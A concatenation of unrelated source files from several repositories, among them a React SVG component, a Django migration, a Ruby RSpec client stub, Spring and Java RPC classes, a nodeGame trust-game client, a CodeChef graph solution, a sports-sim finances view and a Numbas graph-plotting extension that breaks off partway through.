<circle cx="169.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
<circle cx="169.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
<circle cx="169.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
<circle cx="196.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
<circle cx="196.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
<circle cx="196.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
<circle cx="196.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
<circle cx="223.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
<circle cx="223.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
<circle cx="223.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
<circle cx="223.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
<circle cx="250.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
<circle cx="250.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
<circle cx="250.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
<circle cx="250.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
<circle cx="181.04478" cy="412.42122" r="42.01233" fill="#2f2e41" />
<rect
x="345.26919"
y="663.26036"
width="22.86756"
height="12.76328"
transform="translate(-461.09036 11.81391) rotate(-26.60099)"
fill="#2f2e41"
/>
<ellipse
cx="343.15309"
cy="673.4549"
rx="3.98853"
ry="10.63605"
transform="translate(-606.98026 370.43508) rotate(-56.60122)"
fill="#2f2e41"
/>
<rect
x="397.00495"
y="658.20822"
width="12.76328"
height="22.86756"
transform="translate(-574.9977 511.68758) rotate(-63.39901)"
fill="#2f2e41"
/>
<ellipse
cx="416.93647"
cy="673.4549"
rx="10.63605"
ry="3.98853"
transform="translate(-500.85891 121.93016) rotate(-33.39878)"
fill="#2f2e41"
/>
<circle cx="178.10355" cy="402.14476" r="14.35864" fill="#fff" />
<path
d="M368.69613,621.28443c5.123-3.902,10.91409,1.88915,7.01211,7.01211C370.58529,632.19852,364.79415,626.40738,368.69613,621.28443Z"
transform="translate(-199 -218.79252)"
fill="#3f3d56"
/>
<path
d="M413.18665,585.50881c.63178-15.55359-12.77313-28.7276-29.94079-29.42493s-31.59693,11.346-32.22873,26.8996,11.30191,19.08746,28.46957,19.78485S412.55482,601.0624,413.18665,585.50881Z"
transform="translate(-199 -218.79252)"
fill="#ccc"
/>
<ellipse
cx="423.72079"
cy="637.27424"
rx="6.59448"
ry="21.00616"
transform="translate(-511.88371 210.94479) rotate(-40.64516)"
fill="#2f2e41"
/>
<ellipse
cx="336.48632"
cy="637.27424"
rx="21.00616"
ry="6.59448"
transform="translate(-565.22861 258.69053) rotate(-49.35484)"
fill="#2f2e41"
/>
<path
d="M391.5835,647.77028a9.57244,9.57244,0,1,1-18.83532,3.42883l-.00336-.01849c-.94177-5.20215,3.08038-7.043,8.28253-7.98474S390.64179,642.56813,391.5835,647.77028Z"
transform="translate(-199 -218.79252)"
fill="#fff"
/>
<path
d="M824.29678,546.11588H768.287a2.501,2.501,0,0,1-2.5,2.5h-54.98a12.85957,12.85957,0,0,0-2.10987,2,12.41031,12.41031,0,0,0-2.90039,8v2a12.50461,12.50461,0,0,0,12.5,12.5h106a12.51087,12.51087,0,0,0,12.5-12.5v-2A12.51734,12.51734,0,0,0,824.29678,546.11588Z"
transform="translate(-199 -218.79252)"
fill="#3f3d56"
/>
<rect x="566.29199" y="353.82677" width="13" height="92" fill="#3f3d56" />
<path
d="M815.292,664.1626c0,1.40463-19.69947.5433-44,.5433s-44,.86133-44-.5433,19.69947-12.54331,44-12.54331S815.292,662.758,815.292,664.1626Z"
transform="translate(-199 -218.79252)"
fill="#3f3d56"
/>
<path
d="M821.84708,548.99588l-2.18018-13.64a6.57446,6.57446,0,0,0-7.52-5.45l-22.48974,3.59-38.52,6.15-12.53028,2H765.787a2.501,2.501,0,0,1,2.5,2.5v1.97a2.501,2.501,0,0,1-2.5,2.5H696.6171a6.33168,6.33168,0,0,0-2.43018,2,6.48662,6.48662,0,0,0-1.23975,4.96l.61963,3.88.75,4.71.81006,5.06a6.56085,6.56085,0,0,0,7.5,5.44l17.87012-2.85,51.54-8.23,44.35986-7.08A6.58714,6.58714,0,0,0,821.84708,548.99588Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<path
d="M719.12686,550.61588a6.35633,6.35633,0,0,0-2.52978-2H697.477a6.32109,6.32109,0,0,0-2.54,2,6.46518,6.46518,0,0,0-1.37012,3.99v76.21a6.55961,6.55961,0,0,0,6.5503,6.55h13.83007a6.55951,6.55951,0,0,0,6.54981-6.55v-76.21A6.48364,6.48364,0,0,0,719.12686,550.61588Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<path
d="M760.747,420.81589l-.12988-.17-8.58008-10.57a6.31523,6.31523,0,0,0-1.62988-1.43,4.81279,4.81279,0,0,0-1.06006-.54,6.30035,6.30035,0,0,0-1.71-.42005,6.64941,6.64941,0,0,0-1.18018-.02.03156.03156,0,0,0-.02.00995,6.48532,6.48532,0,0,0-3.62012,1.44l-17.60986,14.28-22.62988,18.36-33.77,27.4-2.46,2h42.73l2.46972-2,8.17041-6.63.57959-.46,39.46-32.01.03028-.02a6.45665,6.45665,0,0,0,1.87012-2.45,6.59916,6.59916,0,0,0,.52-1.97A6.501,6.501,0,0,0,760.747,420.81589Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<path
d="M760.6171,420.64591a16.30318,16.30318,0,0,0-3.56006-7.3,16.11778,16.11778,0,0,0-6.6499-4.7c-.4004-.15-.79-.29-1.19-.4a17.14959,17.14959,0,0,0-2.76025-.58.03156.03156,0,0,0-.02.00995,16.3141,16.3141,0,0,0-11.7998,3.26l-30.46,23.28a6.46161,6.46161,0,0,0-2.14991,4.57,6.63325,6.63325,0,0,0,.54981,2.97c.1001.21.21.42.33008.62a5.75613,5.75613,0,0,0,.83984,1.12l4.87988,5.48,11.3501,12.73.31982.36.73047.83a6.54939,6.54939,0,0,0,9.26953.41l26.27-28.22a16.21347,16.21347,0,0,0,3.18994-5.03A16.46589,16.46589,0,0,0,760.6171,420.64591Z"
transform="translate(-199 -218.79252)"
fill="#2f2e41"
/>
<circle cx="573.23055" cy="115.52053" r="50.12206" fill="#6c63ff" />
<path
d="M791.02725,542.09592l-1.37011-8.6-.81006-5.05a6.56327,6.56327,0,0,0-7.51026-5.44l-36.42968,5.81-9.87989,1.58-2,.32v10.93H765.787a2.501,2.501,0,0,1,2.5,2.5v1.97a2.501,2.501,0,0,1-2.5,2.5H662.1171c0,.02.00976.04.00976.06l.62012,3.88,1.56006,9.76a6.56058,6.56058,0,0,0,7.5,5.44l17.87012-2.85,3.88964-.62.75-.12,26.18018-4.18,17.81006-2.85,28.25976-4.51.42041-.07,18.58985-2.96A6.56825,6.56825,0,0,0,791.02725,542.09592Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<path
d="M840.44717,505.31589c0,40.86-4.15039,65.3-68.15039,58.3-.08984-.01-.16992-.02-.25976-.03a190.03023,190.03023,0,0,1-33.73-6.45,100.17439,100.17439,0,0,1-16.64014-6.52c-1.25976-.64-2.46973-1.31-3.66016-2H765.787a2.501,2.501,0,0,0,2.5-2.5v-1.97a2.501,2.501,0,0,0-2.5-2.5H733.02725v-63.16a7.34062,7.34062,0,0,0-7.33008-7.33h1.34961c.23047-.66.46-1.33.71-2,2.43018-6.75,2.19119-12.05978,5.6409-18.66977,4.74023-9.12,4.77-18.29,11-26,4.64013-5.73-9.57058-11.98025-4.35086-16.28024,10.03028-8.28,20.9502-13.4,32.03028-13.4C812.93692,394.80588,840.44717,464.4559,840.44717,505.31589Z"
transform="translate(-199 -218.79252)"
fill="#2f2e41"
/>
<path
d="M773.28362,352.89l.05213-1.873c-3.48454-.09695-6.5566-.31553-8.865-2.002a5.75775,5.75775,0,0,1-2.2302-4.24089,3.29129,3.29129,0,0,1,1.07966-2.7108c1.53237-1.29412,3.99807-.87525,5.79521-.05121l1.54975.71062-2.97192-21.71843-1.85567.25425,2.52789,18.47443a6.61185,6.61185,0,0,0-6.25433.89995,5.12369,5.12369,0,0,0-1.74227,4.207,7.61645,7.61645,0,0,0,2.99707,5.68775C766.33193,352.69515,770.18641,352.80307,773.28362,352.89Z"
transform="translate(-199 -218.79252)"
fill="#2f2e41"
/>
<rect
x="547.57252"
y="104.05912"
width="10.08777"
height="1.87305"
fill="#2f2e41"
/>
<rect
x="579.41439"
y="104.05912"
width="10.08777"
height="1.87305"
fill="#2f2e41"
/>
<path
d="M802.02725,435.14591l-3.97021-2.76-7.39014-5.13a6.56353,6.56353,0,0,0-9.12012,1.65l-24.08984,34.67-22.42969,32.28-2,2.88v42.91h.17969a6.53116,6.53116,0,0,0,4.08984-2,5.832,5.832,0,0,0,.63038-.77l6.98-10.06,17.25-24.83,17.87988-25.72,1.70019-2.45,21.91993-31.55a5.68322,5.68322,0,0,0,.33007-.52,5.26578,5.26578,0,0,0,.26953-.53A6.5499,6.5499,0,0,0,802.02725,435.14591Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<path
d="M802.09708,421.42587a16.08875,16.08875,0,0,0-2.22022-1.22,16.35889,16.35889,0,0,0-19.98,5.16l-22.75976,30.86a6.52488,6.52488,0,0,0,2.17968,9.04l20.72022,13,.25976.16,1.04.65a6.57314,6.57314,0,0,0,9.01026-2.2l16.06982-31.9.27-.53.01025-.01.98975-1.99A16.36294,16.36294,0,0,0,802.09708,421.42587Z"
transform="translate(-199 -218.79252)"
fill="#2f2e41"
/>
<path
d="M662.747,548.61588v75.29a6.5595,6.5595,0,0,0,6.5498,6.55h13.83008a6.55961,6.55961,0,0,0,6.5503-6.55v-75.29Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<path
d="M765.787,539.64591H735.02725v-61.16a9.34032,9.34032,0,0,0-9.33008-9.33H611.62686a9.34209,9.34209,0,0,0-9.33984,9.33v62.8a9.34207,9.34207,0,0,0,9.33984,9.33H765.787c.16015,0,.31006-.01.46-.02.14014-.01.28027-.04.41992-.06a4.5161,4.5161,0,0,0,3.62012-4.42v-1.97A4.50022,4.50022,0,0,0,765.787,539.64591Zm0,8.97H611.62686a7.34268,7.34268,0,0,1-7.33984-7.33v-62.8a7.3427,7.3427,0,0,1,7.33984-7.33H725.69717a7.34062,7.34062,0,0,1,7.33008,7.33v63.16H765.787a2.501,2.501,0,0,1,2.5,2.5v1.97A2.501,2.501,0,0,1,765.787,548.61588Z"
transform="translate(-199 -218.79252)"
fill="#3f3d56"
/>
<circle cx="469.65819" cy="291.09438" r="7.69014" fill="#6c63ff" />
<rect x="533.99698" y="321.91339" width="2" height="9" fill="#3f3d56" />
<ellipse
cx="419.23913"
cy="476.73934"
rx="21.53369"
ry="6.76007"
transform="translate(-374.76036 479.3457) rotate(-69.08217)"
fill="#2f2e41"
/>
<circle
cx="379.43191"
cy="509.26145"
r="43.06735"
transform="translate(-383.03196 583.42673) rotate(-80.78252)"
fill="#2f2e41"
/>
<rect
x="160.80632"
y="324.26854"
width="13.08374"
height="23.44171"
fill="#2f2e41"
/>
<rect
x="186.9738"
y="324.26854"
width="13.08374"
height="23.44171"
fill="#2f2e41"
/>
<ellipse
cx="171.70947"
cy="347.98283"
rx="10.90314"
ry="4.08868"
fill="#2f2e41"
/>
<ellipse
cx="197.87695"
cy="347.43766"
rx="10.90314"
ry="4.08868"
fill="#2f2e41"
/>
<circle
cx="380.52226"
cy="498.35823"
r="14.71922"
transform="translate(-213.47444 -207.40012) rotate(-1.68323)"
fill="#fff"
/>
<circle cx="181.52226" cy="279.56572" r="4.90643" fill="#3f3d56" />
<path
d="M337.65521,469.21c-3.47748-15.57379,7.63867-31.31043,24.82861-35.14881s33.94423,5.67511,37.42171,21.24884-7.91492,21.31763-25.10486,25.156S341.13268,484.7838,337.65521,469.21Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
<ellipse
cx="330.92378"
cy="489.27794"
rx="6.76007"
ry="21.53369"
transform="translate(-451.96302 359.81438) rotate(-64.62574)"
fill="#2f2e41"
/>
<path
d="M358.2774,524.79833c0,4.21515,10.85327,12.53857,22.89656,12.53857s23.33514-11.867,23.33514-16.08209-11.29193.81775-23.33514.81775S358.2774,520.58318,358.2774,524.79833Z"
transform="translate(-199 -218.79252)"
fill="#fff"
/>
<path
d="M462.54343,500.03047l-31.70149,6.18814a3.44009,3.44009,0,0,1-2.92006-.77225,3.498,3.498,0,0,1-1.21664-2.82013,82.89387,82.89387,0,0,0-7.376-37.78583,3.49887,3.49887,0,0,1,.067-3.07069,3.44007,3.44007,0,0,1,2.41528-1.81371l31.70149-6.18814a3.48542,3.48542,0,0,1,3.92839,2.20921,135.69249,135.69249,0,0,1,7.91127,40.529A3.48541,3.48541,0,0,1,462.54343,500.03047Z"
transform="translate(-199 -218.79252)"
fill="#ff6584"
/>
<path
d="M323.54343,529.03047l-31.70149,6.18814a3.44009,3.44009,0,0,1-2.92006-.77225,3.498,3.498,0,0,1-1.21664-2.82013,82.89387,82.89387,0,0,0-7.376-37.78583,3.49887,3.49887,0,0,1,.067-3.07069,3.44007,3.44007,0,0,1,2.41528-1.81371l31.70149-6.18814a3.48542,3.48542,0,0,1,3.92839,2.20921,135.69249,135.69249,0,0,1,7.91127,40.529A3.48541,3.48541,0,0,1,323.54343,529.03047Z"
transform="translate(-199 -218.79252)"
fill="#ccc"
/>
<path
d="M786.6525,299.1247a38.01671,38.01671,0,0,1-28.54472.9922,37.49467,37.49467,0,0,1-24.03187-33.27134l-2.25708,1.2952,9.51588,6.69553a1.50911,1.50911,0,0,0,2.2035-.89645,20.07793,20.07793,0,0,1,9.77987-12.71551,26.20053,26.20053,0,0,1,17.42878-2.89927c12.364,2.00575,23.49492,10.24843,30.73688,20.24348a55.30235,55.30235,0,0,1,8.64194,18.03857,1.50128,1.50128,0,0,0,2.89284-.79752,58.45048,58.45048,0,0,0-21.52744-31.50231c-10.74523-7.97878-25.78831-12.80128-38.4275-6.36048-6.01557,3.06547-10.9114,8.52282-12.41821,15.19552l2.2035-.89645-9.51588-6.69552a1.50928,1.50928,0,0,0-2.25708,1.29521,41.06983,41.06983,0,0,0,11.74991,26.89212,39.92553,39.92553,0,0,0,27.93427,11.68454,40.6256,40.6256,0,0,0,17.40657-3.70711c1.7531-.80294.2304-3.38943-1.51416-2.59041Z"
transform="translate(-199 -218.79252)"
fill="#2f2e41"
/>
<path
d="M365.67431,674.9541l-31.70149,6.18814a3.44009,3.44009,0,0,1-2.92006-.77225,3.498,3.498,0,0,1-1.21664-2.82013,82.89387,82.89387,0,0,0-7.376-37.78583,3.49884,3.49884,0,0,1,.067-3.07069,3.44007,3.44007,0,0,1,2.41528-1.81371l31.70149-6.18814a3.48542,3.48542,0,0,1,3.92839,2.20921,135.69249,135.69249,0,0,1,7.91127,40.529A3.48541,3.48541,0,0,1,365.67431,674.9541Z"
transform="translate(-199 -218.79252)"
fill="#6c63ff"
/>
</svg>
)
}
export default Manage
|
stewardshiptools/stewardshiptools
|
library/migrations/0031_review_places_mentioned.py
|
<filename>library/migrations/0031_review_places_mentioned.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('heritage', '0073_auto_20170501_0803'),
('library', '0030_auto_20170501_1313'),
]
operations = [
migrations.AddField(
model_name='review',
name='places_mentioned',
field=models.ManyToManyField(related_name='item_reviews', to='heritage.Place', blank=True),
),
]
|
raszi/mrkt
|
spec/support/initialized_client.rb
|
<gh_stars>10-100
require 'securerandom'
require 'json'
shared_context 'with an initialized client' do
subject(:client) { Mrkt::Client.new(host: host, client_id: client_id, client_secret: client_secret) }
let(:host) { '0-KBZ-0.mktorest.com' }
let(:client_id) { SecureRandom.uuid }
let(:client_secret) { SecureRandom.hex }
let(:authentication_stub) do
{ access_token: SecureRandom.uuid, token_type: 'bearer', expires_in: 2241, scope: 'RestClient' }
end
before do
@authentication_request_stub = stub_request(:get, "https://#{host}/identity/oauth/token")
.with(query: { client_id: client_id, client_secret: client_secret, grant_type: 'client_credentials' })
.to_return(json_stub(authentication_stub))
end
end
|
228525125/game-card-main
|
src/main/java/org/cx/game/card/controller/LandformEffectController.java
|
<reponame>228525125/game-card-main
package org.cx.game.card.controller;
import java.util.List;
import org.cx.game.card.dao.ILandformEffectDao;
import org.cx.game.card.dao.domain.LandformEffect;
import org.cx.game.card.dao.domain.level.Level;
import org.cx.game.card.exception.DataException;
import org.cx.game.card.tools.LandformEffectBuilder;
import org.cx.game.utils.Error;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpHeaders;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.ExceptionHandler;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseStatus;
import org.springframework.web.bind.annotation.RestController;
@RestController
@RequestMapping("/v1/LandformEffect")
public class LandformEffectController {
@Autowired
private LandformEffectBuilder landformEffectBuilder;
@Autowired
private ILandformEffectDao landformEffectDao;
@RequestMapping(value="/import",method=RequestMethod.GET)
public ResponseEntity<?> importLandformEffect(){
List<LandformEffect> list = landformEffectBuilder.getInstances();
landformEffectDao.saveAll(list);
ResponseEntity<?> responseEntity = getResponseEntity(list);
return responseEntity;
}
@RequestMapping(value="/findAll",method=RequestMethod.GET)
public ResponseEntity<?> findAll(){
List<LandformEffect> list = landformEffectDao.findAll();
ResponseEntity<?> responseEntity = getResponseEntity(list);
return responseEntity;
}
@RequestMapping(value="/findById/{id}",method=RequestMethod.GET)
public ResponseEntity<?> findItemTypeById(@PathVariable Long id){
LandformEffect item = landformEffectDao.findById(id).get();
ResponseEntity<?> responseEntity = getResponseEntity(item);
return responseEntity;
}
@ExceptionHandler({DataException.class})
@ResponseStatus(HttpStatus.BAD_REQUEST)
public Error handleException(DataException e) {
String msg = e.getMessage();
return new Error(HttpStatus.BAD_REQUEST.value(), msg);
}
private static <T> ResponseEntity<T> getResponseEntity(T body) {
HttpHeaders headers = new HttpHeaders();
headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
ResponseEntity<T> responseEntity = new ResponseEntity<T>(body, headers, HttpStatus.OK);
return responseEntity;
}
}
|
ulyn/eos
|
eos-manager/src/main/java/com/sunsharing/eos/manager/agent/process/MainControl.java
|
/**
* @(#)MainControl
* 版权声明 厦门畅享信息技术有限公司, 版权所有 违者必究
*
*<br> Copyright: Copyright (c) 2014
*<br> Company:厦门畅享信息技术有限公司
*<br> @author ulyn
*<br> 14-2-5 下午3:21
*<br> @version 1.0
*————————————————————————————————
*修改记录
* 修改者:
* 修改时间:
* 修改原因:
*————————————————————————————————
*/
package com.sunsharing.eos.manager.agent.process;
import com.sunsharing.eos.common.Constants;
import com.sunsharing.eos.common.rpc.RpcResult;
import com.sunsharing.eos.common.rpc.protocol.RequestPro;
import com.sunsharing.eos.common.rpc.protocol.ResponsePro;
import com.sunsharing.eos.common.serialize.SerializationFactory;
import org.apache.log4j.Logger;
import java.io.IOException;
/**
* <pre></pre>
* <br>----------------------------------------------------------------------
* <br> <b>功能描述:</b>
* <br>
* <br> 注意事项:
* <br> 1.判断是否审批通过
* <br> 2.判断是否需要测试
* <br> 3.调用实际代码
* <br> 4.调用监控逻辑
* <br>----------------------------------------------------------------------
* <br>
*/
public class MainControl {
Logger logger = Logger.getLogger(getClass());
Process[] processes = new Process[]{
new ACLProcess(),
new RemoteProcess(),
new MonitorProcess()
};
public void process(RequestPro req, ResponsePro res) {
ProcessChain processChain = new ProcessChain();
processChain.setProcessList(processes);
try{
processChain.doProcess(req, res, processChain);
}catch (Exception e){
logger.error("调用异常:" + e.getMessage(),e);
RpcResult result = new RpcResult(e);
try {
res.setStatus(Constants.STATUS_ERROR);
res.setResultBytes(
SerializationFactory.serializeToBytes(result, res.getSerialization()));
} catch (IOException ioe) {
throw new RuntimeException("["+ res.getSerialization()
+"]序列化RpcResult对象异常:" + e.getMessage(),e);
}
}
}
}
|
pmtresearch/nodegames
|
games/trustgame/server/game.client.trustor.js
|
<reponame>pmtresearch/nodegames
module.exports = function(stager) {
// Load the respondent interface.
node.on.data('TRUSTOR', function(msg) {
console.log('RECEIVED TRUSTOR!');
other = msg.data.other;
node.set('ROLE', 'TRUSTOR');
W.loadFrame('/trustgame/trustor.html', function() {
var trustorContent = W.getElementById('trustorContent');
var trustorErrors = W.getElementById('trustorErrors');
var setUpTrustTimer = function() {
var options = {
milliseconds: node.env.timeout,
timeup: function() {
node.emit('TRUST_DONE', other, Math.floor(Math.random() * node.env.coins));
}
};
node.game.timer.startTiming(options);
node.env('auto', function() {
node.timer.randomExec(function() {
node.emit(
'TRUST_DONE',
other,
Math.floor(Math.random() * node.env.coins)
);
}, 4000);
});
};
node.on('TRUST_DONE', function(other, trustAmount) {
console.log('Trusted trustee with ' + trustAmount);
node.set('trustAmount', {
amount: trustAmount,
other: other
});
node.say('TRUST_DONE', other, trustAmount);
trustorErrors.innerHTML = '';
trustorContent.innerHTML = '<h3>Waiting for the trustee ... (gave ' +
trustAmount + ')</h3>';
node.game.timer.clear();
node.game.timer.startWaiting({milliseconds: node.env.timeout});
node.game.timer.mainBox.hideBox();
});
setUpTrustTimer();
trustorContent.innerHTML =
'<h3>For how much money do you trust the other player for?</h3>' +
'<input type="number" min="0" max="' + node.env.coins + '" id="trustAmount" />' +
'<input type="button" value="Submit" id="trustWithMoney" class="btn" />';
var trustWithMoney = W.getElementById('trustWithMoney');
trustWithMoney.onclick = function() {
var trustAmount = W.getElementById('trustAmount');
if (!stager.isValidBid(trustAmount.value)) {
trustorErrors.innerHTML = 'Please enter a number between 0 and ' + node.env.coins;
return;
}
node.emit('TRUST_DONE', other, trustAmount.value);
};
node.on.data('RETURN_DONE', function(msg) {
trustorContent.innerHTML = '<h3>You got an amount of ' + msg.data + ' back.</h3>';
node.timer.randomEmit('DONE', 3000);
});
});
});
};
|
arhankundu99/Algo
|
Codechef/DSA Series/Graph Theory Basics/FIRESC.java
|
/* package codechef; // don't place package name! */
import java.util.*;
import java.lang.*;
import java.io.*;
/* Name of the class has to be "Main" only if the class is public. */
class Codechef
{
static long ans1 = 0, chainLength = 0;
static int M = 1000000007;
static long ans2 = 1;
public static void main (String[] args) throws java.lang.Exception
{
Scanner scan = new Scanner(System.in);
int t = scan.nextInt();
while(t-->0)
{
int n = scan.nextInt();
int m = scan.nextInt();
ans1 = 0;
ans2 = 1;
Map<Integer, Set<Integer>>map = new HashMap<>();
for(int i=1 ;i<=n;i++)map.put(i, new HashSet<>());
for(int i=0;i<m;i++)
{
int f1 = scan.nextInt();
int f2 = scan.nextInt();
map.get(f1).add(f2);
map.get(f2).add(f1);
}
boolean[] vis = new boolean[n+1];
for(int key : map.keySet())
{
if(vis[key])continue;
chainLength = 0;
dfs(key, map, vis);
ans1 = (ans1 + 1) % M;
ans2 = (ans2 * chainLength) % M;
}
System.out.println(ans1+" "+ans2);
}
}
public static void dfs(int idx, Map<Integer, Set<Integer>>map, boolean[] vis)
{
if(vis[idx])return;
vis[idx] = true;
chainLength++;
Set<Integer>set = map.get(idx);
for(int i : set)dfs(i, map, vis);
}
}
|
mattthehearn/gm-games
|
src/deion/worker/views/teamFinances.js
|
<reponame>mattthehearn/gm-games
import { PHASE } from "../../common";
import { team } from "../core";
import { idb } from "../db";
import { g, helpers, lock } from "../util";
import type { GetOutput, UpdateEvents } from "../../common/types";
async function updateTeamFinances(
inputs: { abbrev: string, show: number | "all", tid: number },
updateEvents: UpdateEvents,
state: any,
): void | { [key: string]: any } {
if (
updateEvents.includes("gameSim") ||
updateEvents.includes("playerMovement") ||
updateEvents.includes("teamFinances") ||
inputs.tid !== state.tid ||
inputs.show !== state.show
) {
const vars: any = {
abbrev: inputs.abbrev,
gamesInProgress: lock.get("gameSim"),
hardCap: g.hardCap,
numGames: g.numGames,
tid: inputs.tid,
show: inputs.show,
salaryCap: g.salaryCap / 1000,
minContract: g.minContract,
minPayroll: g.minPayroll / 1000,
luxuryPayroll: g.luxuryPayroll / 1000,
luxuryTax: g.luxuryTax,
userTid: g.userTid,
};
const contracts = await team.getContracts(inputs.tid);
const payroll = await team.getPayroll(contracts);
vars.payroll = payroll / 1000;
let showInt;
if (inputs.show === "all") {
showInt = g.season - g.startingSeason + 1;
} else {
showInt = parseInt(inputs.show, 10);
}
// Convert contract objects into table rows
const contractTotals = [0, 0, 0, 0, 0];
let season = g.season;
if (g.phase >= PHASE.DRAFT) {
// After the draft, don't show old contract year
season += 1;
}
for (let i = 0; i < contracts.length; i++) {
contracts[i].amounts = [];
for (let j = season; j <= contracts[i].exp; j++) {
// Only look at first 5 years (edited rosters might have longer contracts)
if (j - season >= 5) {
break;
}
contracts[i].amounts.push(contracts[i].amount / 1000);
contractTotals[j - season] += contracts[i].amount / 1000;
}
delete contracts[i].amount;
delete contracts[i].exp;
}
vars.contracts = contracts;
vars.contractTotals = contractTotals;
vars.salariesSeasons = [
season,
season + 1,
season + 2,
season + 3,
season + 4,
];
const teamSeasons = await idb.getCopies.teamSeasons({
tid: inputs.tid,
});
teamSeasons.reverse(); // Most recent season first
// Add in luxuryTaxShare if it's missing
for (let i = 0; i < teamSeasons.length; i++) {
if (!teamSeasons[i].revenues.hasOwnProperty("luxuryTaxShare")) {
teamSeasons[i].revenues.luxuryTaxShare = {
amount: 0,
rank: 15,
};
}
}
let keys = [
"won",
"hype",
"pop",
"att",
"cash",
"revenues",
"expenses",
];
const barData = {};
for (let i = 0; i < keys.length; i++) {
/* eslint-disable no-loop-func */
if (typeof teamSeasons[0][keys[i]] !== "object") {
barData[keys[i]] = helpers.nullPad(
teamSeasons.map(ts => ts[keys[i]]),
showInt,
);
} else {
// Handle an object in the database
barData[keys[i]] = {};
const tempData = teamSeasons.map(ts => ts[keys[i]]);
for (const key of Object.keys(tempData[0])) {
barData[keys[i]][key] = helpers.nullPad(
tempData.map(x => x[key]).map(x => x.amount),
showInt,
);
}
}
/* eslint-enable no-loop-func */
}
// Process some values
barData.att = barData.att.map((num, i) => {
if (teamSeasons[i] !== undefined) {
if (!teamSeasons[i].hasOwnProperty("gpHome")) {
teamSeasons[i].gpHome = Math.round(teamSeasons[i].gp / 2);
} // See also game.js and team.js
if (teamSeasons[i].gpHome > 0) {
return num / teamSeasons[i].gpHome; // per game
}
return 0;
}
});
keys = ["cash"];
for (let i = 0; i < keys.length; i++) {
barData[keys[i]] = barData[keys[i]].map(num => num / 1000); // convert to millions
}
const barSeasons = [];
for (let i = 0; i < showInt; i++) {
barSeasons[i] = g.season - i;
}
vars.barData = barData;
vars.barSeasons = barSeasons;
// Get stuff for the finances form
vars.t = await idb.getCopy.teamsPlus({
attrs: ["region", "name", "abbrev", "budget"],
seasonAttrs: ["expenses"],
season: g.season,
tid: inputs.tid,
});
vars.maxStadiumCapacity = teamSeasons.reduce((max, teamSeason) => {
if (teamSeason.stadiumCapacity > max) {
return teamSeason.stadiumCapacity;
}
return max;
}, 0);
return vars;
}
}
function updateGamesInProgress(
inputs: GetOutput,
updateEvents: UpdateEvents,
state: any,
): void | { [key: string]: any } {
if (
updateEvents.includes("lock.gameSim") ||
inputs.tid !== state.tid ||
inputs.show !== state.show
) {
return {
gamesInProgress: lock.get("gameSim"),
};
}
}
export default {
runBefore: [updateTeamFinances, updateGamesInProgress],
};
|
julianmack/Numbas
|
extensions/graphs/graphs.js
|
/*
Copyright 2011 Newcastle University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
//a module to draw graphs of functions using flot.
//
//To use, insert a div with class "graph" in content. The expr, min, max and steps attributes control the function to be plotted.
//
//Example:
//
// notextile. <div class="graph" expr="x^2" min="0" max="10" steps="20"></div>
Numbas.queueScript('extensions/graphs/graphs.js',['display','util','jme'],function() {
Numbas.loadScript('extensions/graphs/flot/jquery.flot.min.js');
var jme = Numbas.jme;
var util = Numbas.util;
var QuestionDisplay = Numbas.display.QuestionDisplay;
QuestionDisplay.prototype.show = util.extend(QuestionDisplay.prototype.show,function() {
var q = this.q;
var subvars = Numbas.jme.subvars;
//do graphs
$('.graph').each(function()
{
var expr = $(this).attr('expr');
expr = subvars(expr,q.variables);
var rangeMin = $(this).attr('min');
var rangeMax = $(this).attr('max');
var rangeSteps = $(this).attr('steps');
var settings = {
min: jme.evaluate(jme.compile(rangeMin,q.functions),q.variables,q.functions).value,
max: jme.evaluate(jme.compile(rangeMax,q.functions),q.variables,q.functions).value,
steps: jme.evaluate(jme.compile(rangeSteps,q.functions),q.variables,q.functions).value
};
var tree = jme.compile(expr,q.functions);
var varname = jme.findvars(tree)[0];
var variables = util.copyobj(q.variables);
var points = [];
for(var i=0; i<settings.steps; i++)
{
var x = i*(settings.max-settings.min)/(settings.steps-1);
variables[varname] = new jme.types.TNum(x);
var y = jme.evaluate(tree,variables,q.functions).value;
points[i] = [x,y];
}
$(this).width(300).height(300);
var miny=null,maxy=null;
for(i=0;i<points.length;i++)
{
if(miny==null || points[i][1]<miny){miny=points[i][1];}
if(maxy==null || points[i][1]>maxy){maxy=points[i][1];}
}
$.plot($(this),
[points],
{
legend:{show:false},
grid:{
borderWidth:0,
markings: [{
xaxis:{from:0,to:0},
